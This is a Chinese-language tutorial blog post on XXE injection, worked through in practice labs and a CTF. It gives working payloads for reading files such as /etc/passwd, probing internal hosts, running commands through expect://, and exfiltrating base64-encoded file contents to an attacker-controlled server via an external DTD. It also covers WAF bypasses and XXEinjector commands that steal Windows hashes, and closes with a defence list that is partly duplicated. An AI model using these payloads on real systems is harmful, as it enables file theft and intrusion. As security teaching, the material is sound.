XXE 漏洞及案例实战

文章目录

  • [XXE 漏洞](#XXE 漏洞)
    • [1. 基础概念](#1. 基础概念)
      • [1.1 XML基础概念](#1.1 XML基础概念)
      • [1.2 XML与HTML的主要差异](#1.2 XML与HTML的主要差异)
      • [1.3 xml示例](#1.3 xml示例)
    • [2. 演示案例](#2. 演示案例)
      • [2.1 pikachu靶场XML](#2.1 pikachu靶场XML)
        • [2.1.1 文件读取](#2.1.1 文件读取)
        • [2.1.2 内网探针或者攻击内网应用(触发漏洞地址)](#2.1.2 内网探针或者攻击内网应用(触发漏洞地址))
        • [2.1.4 RCE](#2.1.4 RCE)
        • [2.1.5 引入外部实体DTD](#2.1.5 引入外部实体DTD)
        • [2.1.6 无回显读取文件](#2.1.6 无回显读取文件)
    • [3. XXE 绕过](#3. XXE 绕过)
      • [3.1 data://协议绕过](#3.1 data://协议绕过)
      • [3.2 file://协议加文件上传](#3.2 file://协议加文件上传)
      • [3.3 php://filter协议加文件上传](#3.3 php://filter协议加文件上传)
    • [4. XXE 靶场](#4. XXE 靶场)
      • [4.1 xxe-lab靶场](#4.1 xxe-lab靶场)
      • [4.2 CTF-Jarvis-OJ-Web-XXE](#4.2 CTF-Jarvis-OJ-Web-XXE)
      • [4.3 Vulnhub/XXE Lab: 1](#4.3 Vulnhub/XXE Lab: 1)
    • [5. XXE 工具](#5. XXE 工具)
      • [5.1 获取地址](#5.1 获取地址)
      • [5.2 参数说明](#5.2 参数说明)
      • [5.3 工具使用](#5.3 工具使用)
    • [6. XXE 安全防御](#6. XXE 安全防御)

XXE 漏洞

1. 基础概念

1.1 XML基础概念

XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档 类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XML External Entity Injection,即XML外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。

1.2 XML与HTML的主要差异

XML被设计为传输和存储数据,其焦点是数据的内容

HTML被设计用来显示数据,其焦点是数据的外观

HTML旨在显示信息,而XML旨在传输信息。

1.3 xml示例

xml 复制代码
<!--文档类型定义-->
<!DOCTYPE note [	<!--定义此文档时note类型的文档-->
<!ELEMENT note (to,from,heading,body)>	<!--定义note元素有四个元素-->
<!ELEMENT to (#PCDATA)>			<!--定义to元素为"#PCDATA"类型-->
<!ELEMENT from (#PCDATA)>		<!--定义from元素为"#PCDATA"类型-->
<!ELEMENT head (#PCDATA)>		<!--定义head元素为"#PCDATA"类型-->
<!ELEMENT body (#PCDATA)>		<!--定义body元素为"#PCDATA"类型-->
]]]>

<!--文档元素-->
<note>
    <to>Dave</to>
    <from>Tom</from>
    <head>Reminder</head>
    <body>You are a good man</body>
</note>

2. 演示案例

2.1 pikachu靶场XML

libxml2 PHP Java .NET
file http ftp file http ftp php compress.zlib compress.bzip2 data glob phar http https ftp file jar netdoc mailto gopher * file http https ftp

开启靶场

2.1.1 文件读取
xml 复制代码
<?xml version = "1.0"?>
<!DOCTYPE ANY [
		<!ENTITY xxe SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">
]>
<x>&xxe;</x>

注意:文件读取的前提是得有读取的文件。

2.1.2 内网探针或者攻击内网应用(触发漏洞地址)
xml 复制代码
<?xml version = "1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTYTY wuhu SYSTEM "http://192.168.188.194:80/index.txt">
]>
<x>&wuhu;</x>

上面的ip地址假设就是内网的一台服务器的ip地址。还可以进行一个端口扫描,看一下端口是否开放。

如果访问的文件不存在,会显示如下图的信息

说明:这种情况实战中一般不容易遇到,因为前提条件比较多,确定内网上存在该文件,并且确定存在该漏洞。还得确定内网上存在该IP地址。

2.1.4 RCE

该CASE是在安装expect扩展的PHP环境里执行系统命令

xml 复制代码
<?xml version = "1.0"?>
<!DOCTYPE ANY [
		<!ENTITY xxe SYSTEM "expect://id">
]>
<x>&xxe;</x>

id是对于的执行的命令。实战情况比较难碰到。

2.1.5 引入外部实体DTD
xml 复制代码
<?xml version = "1.0"?>
<!DOCTYPE test [
		<!ENTITY % file SYSTEM "http://127.0.0.1/evil2.dtd">
		%file;
]>
<x>&send;</x>

evil2.dtd文件

文件内容如下:

xml 复制代码
<!ENTITY send SYSTEM "file:///c:/wuhu.txt">

条件:看对方的应用有没有禁用外部实体引用,这也是防御XXE的一种措施。

2.1.6 无回显读取文件

先将靶场的回显代码注释掉

攻击代码:

xml 复制代码
<?xml version = "1.0"?>
<!DOCTYPE test [
		<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=c:/wuhu.txt">
		<!ENTITY % dtd SYSTEM "http://192.168.188.197/test.dtd">
		%dtd;
		%send;
]>

test.dtd:

xml 复制代码
<!ENTITY % payload
	"<!ENTITY &#x25; send SYSTEM
'http://192.168.188.197/?data=%file;'>"
>
%payload;

上面的url一般是自己的网站,通过第一步访问文件,然后再访问dtd文件,把读取到的数据赋给data,然后我们只需要再自己的网站日志,或者写个php脚本保存下来,就能看到读取到的文件数据了。

开启phpstudy--apache日志

然后进行攻击,无回显,查看日志信息。

解码网站

3. XXE 绕过

CTF XXE

绕过WAF保护的XXE

'ENTITY' 'YSTEM' 'file' 等关键词被过滤

使用编码方式绕过:UTF-16BE
cat payload.xml | iconv -f utf-8 -t utf-16be > payload.8-16be.xml

若http被过滤,可以使用如下进行绕过

3.1 data://协议绕过

xml 复制代码
<?xml version="1.0" ?>
<!DOCTYPE test [
    <!ENTITY % a " <!ENTITY %  b SYSTEM 'http://118.25.14.40:8200/hack.dtd'> "> 
    %a;
    %b;
]>
<test>&hhh;</test>

3.2 file://协议加文件上传

xml 复制代码
<?xml version="1.0" ?>
<!DOCTYPE test [
    <!ENTITY % a SYSTEM "file:///var/www/uploads/cfcd208495d565ef66e7dff9f98764da.jpg">
    %a;
]>
<!--上传文件-->
<!ENTITY % b SYSTEM 'http://118.25.14.40:8200/hack.dtd'>

3.3 php://filter协议加文件上传

xml 复制代码
<?xml version="1.0" ?>
<!DOCTYPE test [
    <!ENTITY % a SYSTEM "php://filter/resource=/var/www/uploads/cfcd208495d565ef66e7dff9f98764da.jpg">
    %a;
]>
    <test>
        &hhh;
    </test>

<!--上传文件-->
<!ENTITY hhh SYSTEM 'php://filter/read=convert.base64-encode/resource=./flag.php'>
xml 复制代码
<?xml version="1.0" ?>
<!DOCTYPE test [
    <!ENTITY % a SYSTEM "php://filter/read=convert.base64-decode/resource=/var/www/uploads/cfcd208495d565ef66e7dff9f98764da.jpg">
    %a;
]>
    <test>
        &hhh;
    </test>
<!--上传文件-->
PCFFTlRJVFkgaGhoIFNZU1RFTSAncGhwOi8vZmlsdGVyL3JlYWQ9Y29udmVydC5iYXNlNjQtZW5jb2RlL3Jlc291cmNlPS4vZmxhZy5waHAnPg==

4. XXE 靶场

4.1 xxe-lab靶场

https://github.com/c0ny1/xxe-lab

使用bp抓取数据包,发现Content-Type参数是application/xml,说明在传输数据的时候采用的是xml语言进行传输的。并且传递的数据中代码的写法也是xml语言的写法。从而就证明了存在XXE漏洞。

Payload:

xml 复制代码
<?xml version="1.0"?>
<!DOCTYPE Mikasa [
<!ENTITY test SYSTEM "file:///C:/wuhu.txt">
]>
<user><username>&test;</username><password>Mikasa</password></user>

将数据包发送到Request模块,然后将攻击的payload复制到指定的位置上,发包即可。

读取文件获取用户名密码

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note[
<!ENTITY test SYSTEM "PHP://filter/read=convert.base64-encode/resource=C:/software/phpstudy_pro/WWW/xxe-lab-master/php_xxe/doLogin.php">
]>
 <user><username>admin;&test;</username><password>123456</password></user>

对读取的内容进行base64解码:

返回页面进行登录。

4.2 CTF-Jarvis-OJ-Web-XXE

链接地址

访问页面如下

点击Go!,使用BurpSuite抓取数据包

发现Content-Type的参数是application/json类型的,传递的数据格式是JSON格式的。

那么我们可以修改Content-Type的类型为xml,并提交构造的Payload。

xml 复制代码
<?xml version="1.0"?>
<!DOCTYPE  ANY [
<!ENTITY ss SYSTEM "file:///etc/passwd">
]>
<x>&ss;</x>

读取etc下的shadow文件

4.3 Vulnhub/XXE Lab: 1

靶场地址:Vulnhub/XXE Lab: 1

下载链接:Download (Mirror)

5. XXE 工具

XXEinjector本身提供了非常丰富的操作选项,所以大家在利用XXEinjector进行渗透测试之前,请自习了解这些配置选项,以最大限度地发挥XXEinjector的功能。当然了,由于XXEinjector是基于Ruby开发的,所以Ruby运行环境就是必须的了。这里建议在kali环境下运行。

5.1 获取地址

https://github.com/enjoiz/XXEinjector
https://github.com/enjoiz/XXEinjector/archive/master.zip

5.2 参数说明

sh 复制代码
--host     			# 必填项-- 用于建立反向链接的IP地址。(--host=192.168.0.2)
--file      		# 必填项- 包含有效HTTP请求的XML文件。(--file=/tmp/req.txt)
--path           	# 必填项-是否需要枚举目录 -- 枚举路径。(--path=/etc)
--brute          	# 必填项-是否需要爆破文件 -爆破文件的路径。(--brute=/tmp/brute.txt)
--logger        	# 记录输出结果。
--rhost         	# 远程主机IP或域名地址。(--rhost=192.168.0.3)
--rport          	# 远程主机的TCP端口信息。(--rport=8080)
--phpfilter    		# 在发送消息之前使用PHP过滤器对目标文件进行Base64编码。
--netdoc     		# 使用netdoc协议。(Java).
--enumports  		# 枚举用于反向链接的未过滤端口。(--enumports=21,22,80,443,445)
--hashes      		# 窃取运行当前应用程序用户的Windows哈希。
--expect       		# 使用PHP expect扩展执行任意系统命令。(--expect=ls)
--upload       		# 使用Java jar向临时目录上传文件。(--upload=/tmp/upload.txt)
--xslt      		# XSLT注入测试。
--ssl              	# 使用SSL。
--proxy        		# 使用代理。(--proxy=127.0.0.1:8080)
--httpport 			# Set自定义HTTP端口。(--httpport=80)
--ftpport       	# 设置自定义FTP端口。(--ftpport=21)
--gopherport  		# 设置自定义gopher端口。(--gopherport=70)
--jarport       	# 设置自定义文件上传端口。(--jarport=1337)
--xsltport  		# 设置自定义用于XSLT注入测试的端口。(--xsltport=1337)
--test     			# 该模式可用于测试请求的有效。
--urlencode     	# URL编码,默认为URI。
--output       		# 爆破攻击结果输出和日志信息。(--output=/tmp/out.txt)
--timeout     		# 设置接收文件/目录内容的Timeout。(--timeout=20)
--contimeout  		# 设置与服务器断开连接的,防止DoS出现。(--contimeout=20)
--fast     			# 跳过枚举询问,有可能出现结果假阳性。
--verbose     		# 显示verbose信息。

5.3 工具使用

枚举HTTPS应用程序中的/etc目录:

sh 复制代码
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl

使用gopher(OOB方法)枚举/etc目录:

sh 复制代码
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher

二次漏洞利用:

sh 复制代码
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt--2ndfile=/tmp/2ndreq.txt

使用HTTP带外方法和netdoc协议对文件进行爆破攻击:

sh 复制代码
ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt--file=/tmp/req.txt --oob=http --netdoc

通过直接性漏洞利用方式进行资源枚举:

sh 复制代码
ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK

枚举未过滤的端口:

sh 复制代码
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all

窃取Windows哈希:

sh 复制代码
ruby XXEinjector.rb--host=192.168.0.2 --file=/tmp/req.txt --hashes

使用Java jar上传文件:

sh 复制代码
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt--upload=/tmp/uploadfile.pdf

使用PHP expect执行系统指令:

sh 复制代码
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter--expect=ls

测试XSLT注入:

sh 复制代码
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt

记录请求信息:

sh 复制代码
ruby XXEinjector.rb --logger --oob=http--output=/tmp/out.txt

6. XXE 安全防御

防范XXE攻击,可以采取以下措施:

  1. 输入验证和过滤:对于接收到的 XML 输入,进行严格的输入验证和过滤。确保只接受符合预期格式和结构的 XML 数据,并拒绝不受信任或异常的输入。
  2. 禁用外部实体解析:在 XML 解析器中,禁用或限制外部实体的解析。可以通过设置解析器参数、使用安全配置文件(如 XXE 防御模板)或编程方式来实现。
  3. 使用本地 DTD:避免使用外部 DTD(Document Type Definition)文件,并使用本地 DTD 或内联 DTD 来定义 XML 结构。这样可以防止攻击者利用外部实体声明。
  4. 解析时禁用网络访问:配置 XML 解析器,确保在解析 XML 时禁用或限制对外部网络资源的访问,以防止加载远程实体或资源。
  5. 使用安全的解析库:选择使用经过安全审计和漏洞修复的 XML 解析库。确保使用最新版本的解析库,并及时应用安全补丁。
  6. 白名单验证:根据业务需求,使用白名单验证来限制允许的实体和合法的数据类型。只允许所需的实体和数据类型,拒绝其他实体和不可信的数据类型。
  7. 安全配置:对服务器和应用程序进行安全配置,例如限制文件系统访问权限、禁止外部网络请求等,以减少攻击面和风险。
  8. 升级至最新的 XML 规范:使用最新的 XML 规范,如 XML 1.1 版本,在新规范中对 XXE 攻击进行了一些改进和修复。
    解析器参数、使用安全配置文件(如 XXE 防御模板)或编程方式来实现。
  9. 使用本地 DTD:避免使用外部 DTD(Document Type Definition)文件,并使用本地 DTD 或内联 DTD 来定义 XML 结构。这样可以防止攻击者利用外部实体声明。
  10. 解析时禁用网络访问:配置 XML 解析器,确保在解析 XML 时禁用或限制对外部网络资源的访问,以防止加载远程实体或资源。
  11. 使用安全的解析库:选择使用经过安全审计和漏洞修复的 XML 解析库。确保使用最新版本的解析库,并及时应用安全补丁。
  12. 白名单验证:根据业务需求,使用白名单验证来限制允许的实体和合法的数据类型。只允许所需的实体和数据类型,拒绝其他实体和不可信的数据类型。
  13. 安全配置:对服务器和应用程序进行安全配置,例如限制文件系统访问权限、禁止外部网络请求等,以减少攻击面和风险。
  14. 升级至最新的 XML 规范:使用最新的 XML 规范,如 XML 1.1 版本,在新规范中对 XXE 攻击进行了一些改进和修复。
  15. 安全审计和测试:定期进行安全审计和测试,包括代码审查、渗透测试和漏洞扫描等,以发现并修复潜在的 XXE 漏洞。
相关推荐
MARIN_shen5 分钟前
Marin说PCB之POC电路layout设计仿真案例---06
网络·单片机·嵌入式硬件·硬件工程·pcb工艺
m0_7482400244 分钟前
Chromium 中chrome.webRequest扩展接口定义c++
网络·c++·chrome
終不似少年遊*1 小时前
华为云计算HCIE笔记05
网络·华为云·云计算·学习笔记·hcie·认证·hcs
星竹1 小时前
upload-labs-master第21关超详细教程
网络安全
蜜獾云1 小时前
docker 安装雷池WAF防火墙 守护Web服务器
linux·运维·服务器·网络·网络安全·docker·容器
虹科数字化与AR2 小时前
安宝特应用 | 美国OSHA扩展Vuzix AR眼镜应用,强化劳动安全与效率
安全·ar·远程协助
小林熬夜学编程2 小时前
【Linux网络编程】第十四弹---构建功能丰富的HTTP服务器:从状态码处理到服务函数扩展
linux·运维·服务器·c语言·网络·c++·http
Hacker_Fuchen2 小时前
天融信网络架构安全实践
网络·安全·架构
炫彩@之星2 小时前
Windows和Linux安全配置和加固
linux·windows·安全·系统安全配置和加固
上海运维Q先生2 小时前
面试题整理15----K8s常见的网络插件有哪些
运维·网络·kubernetes